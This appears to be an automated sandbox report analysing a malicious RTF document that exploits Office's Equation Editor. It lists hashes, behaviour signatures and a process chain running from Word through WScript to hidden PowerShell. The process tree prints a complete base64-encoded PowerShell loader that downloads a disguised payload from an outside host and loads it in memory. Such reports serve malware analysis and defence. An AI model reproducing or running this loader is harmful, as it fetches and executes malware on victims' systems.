Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
31-07-2024 13:36
Static task
static1
Behavioral task
behavioral1
Sample
weneedgreatthingsalwaystogetmehairdrandtgreatthingsonheretoheighhmangotreeonhere_____________bettermangotreeonheretoget.rtf
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
weneedgreatthingsalwaystogetmehairdrandtgreatthingsonheretoheighhmangotreeonhere_____________bettermangotreeonheretoget.rtf
Resource
win10v2004-20240730-en
General
-
Target
weneedgreatthingsalwaystogetmehairdrandtgreatthingsonheretoheighhmangotreeonhere_____________bettermangotreeonheretoget.rtf
-
Size
77KB
-
MD5
4b9305dcc211e64941a71120617c8983
-
SHA1
53b7292c31055f3e50e555542ce517bd0237b1a0
-
SHA256
60415ee85c74fc9666c2445a4a36db0dbab76a25de01af187cb96ee83f492100
-
SHA512
7d84b0c4c8bb2217f4072032f1179de1d116ca10d7842c77740b56a0671400c5032986ba5967d5b8836bd25e818ba06487531f090a9a6d3ee7dbbd68e4370923
-
SSDEEP
384:TpTZwOjBKrUqMtpOrxdc5gEp2wZTNvK3iH5kreVI9RIebbusxSMwq:TpVwOjkrUKYgkpKSHpVIP9bbusxSc
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
EQNEDT32.EXEflow pid process 4 2480 EQNEDT32.EXE -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 2724 powershell.exe 2264 powershell.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exepowershell.exeWINWORD.EXEEQNEDT32.EXEWScript.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2288 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2724 powershell.exe 2264 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2724 powershell.exe Token: SeDebugPrivilege 2264 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2288 WINWORD.EXE 2288 WINWORD.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
EQNEDT32.EXEWScript.exepowershell.exeWINWORD.EXEdescription pid process target process PID 2480 wrote to memory of 2712 2480 EQNEDT32.EXE WScript.exe PID 2480 wrote to memory of 2712 2480 EQNEDT32.EXE WScript.exe PID 2480 wrote to memory of 2712 2480 EQNEDT32.EXE WScript.exe PID 2480 wrote to memory of 2712 2480 EQNEDT32.EXE WScript.exe PID 2712 wrote to memory of 2724 2712 WScript.exe powershell.exe PID 2712 wrote to memory of 2724 2712 WScript.exe powershell.exe PID 2712 wrote to memory of 2724 2712 WScript.exe powershell.exe PID 2712 wrote to memory of 2724 2712 WScript.exe powershell.exe PID 2724 wrote to memory of 2264 2724 powershell.exe powershell.exe PID 2724 wrote to memory of 2264 2724 powershell.exe powershell.exe PID 2724 wrote to memory of 2264 2724 powershell.exe powershell.exe PID 2724 wrote to memory of 2264 2724 powershell.exe powershell.exe PID 2288 wrote to memory of 272 2288 WINWORD.EXE splwow64.exe PID 2288 wrote to memory of 272 2288 WINWORD.EXE splwow64.exe PID 2288 wrote to memory of 272 2288 WINWORD.EXE splwow64.exe PID 2288 wrote to memory of 272 2288 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\weneedgreatthingsalwaystogetmehairdrandtgreatthingsonheretoheighhmangotreeonhere_____________bettermangotreeonheretoget.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\roseflowergetmeforgirlshair.vBS"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABsAGkAbgBrACAAPQAgACcAaAB0AHQAcAA6AC8ALwBzAGUAcgB2AGkAZABvAHIAdwBpAG4AZABvAHcAcwAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwAvAEYAaQBsAGUAcwAvAHYAYgBzAC4AagBwAGUAZwAnADsAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgAHQAcgB5ACAAewAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJwBGAGEAaQBsAGUAZAAgAFQAbwAgAGQAbwB3AG4AbABvAGEAZAAgAGQAYQB0AGEAIABmAHIAbwBtACAAJABsAGkAbgBrACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQAOwAgAGUAeABpAHQAIAB9ADsAIABpAGYAIAAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACkAOwAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlACcAKQA7ACAAJABtAGUAdABoAG8AZAAgAD0AIAAkAHQAeQBwAGUALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgBSAFYAUgBTAC8ANQAwADgALwAxADUALgA2ADYALgA5ADcALgA1ADQALwAvADoAcAB0AHQAaAAnACAALAAgACcAZABlAHMAYQB0AGkAdgBhAGQAbwAnACAALAAgACcAZABlAHMAYQB0AGkAdgBhAGQAbwAnACAALAAgACcAZABlAHMAYQB0AGkAdgBhAGQAbwAnACwAJwBSAGUAZwBBAHMAbQAnACwAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAKQApACAAfQAgAH0A';$OWjuxD = [system.Text.encoding ]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD57cf6980e2d452b909e5dd9c55e37c04b
SHA1b164fd26bf2b73127b83aea72a063e85af928cb9
SHA256f9e5452a8f0314e798b73c877a52086bc18e652518d74ba227997370fd423b16
SHA51262d5f211282cd8c8364372a4afee49b6be7f178cca8952f3c7c6ee8e29987acdabf7f94d0e698c2e830dac5cd3493a36957d015d5136fd1e62db3355f4491786
-
C:\Users\Admin\AppData\Roaming\roseflowergetmeforgirlshair.vBSFilesize
234KB
MD5935dee250a117207ad585b612947fa27
SHA1c6ae8ce6d985d1be08adf7f14ef2ce0ffbc1cd62
SHA2561d2f072eaaa8fd2f52c3dfaa1a888b614ed4ea21ecd4daff2f959d81f789a671
SHA512b2f7144e0748a6fd1b423ba9fa2b694011d1591c966faae54b8a89409c686938bed0550b7a9bb84bdd48ac85483204ee81fb0b2a319c748a41ceb4b5e14170e7
-
memory/2288-0-0x000000002F071000-0x000000002F072000-memory.dmpFilesize
4KB
-
memory/2288-1-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2288-2-0x000000007112D000-0x0000000071138000-memory.dmpFilesize
44KB
-
memory/2288-23-0x000000007112D000-0x0000000071138000-memory.dmpFilesize
44KB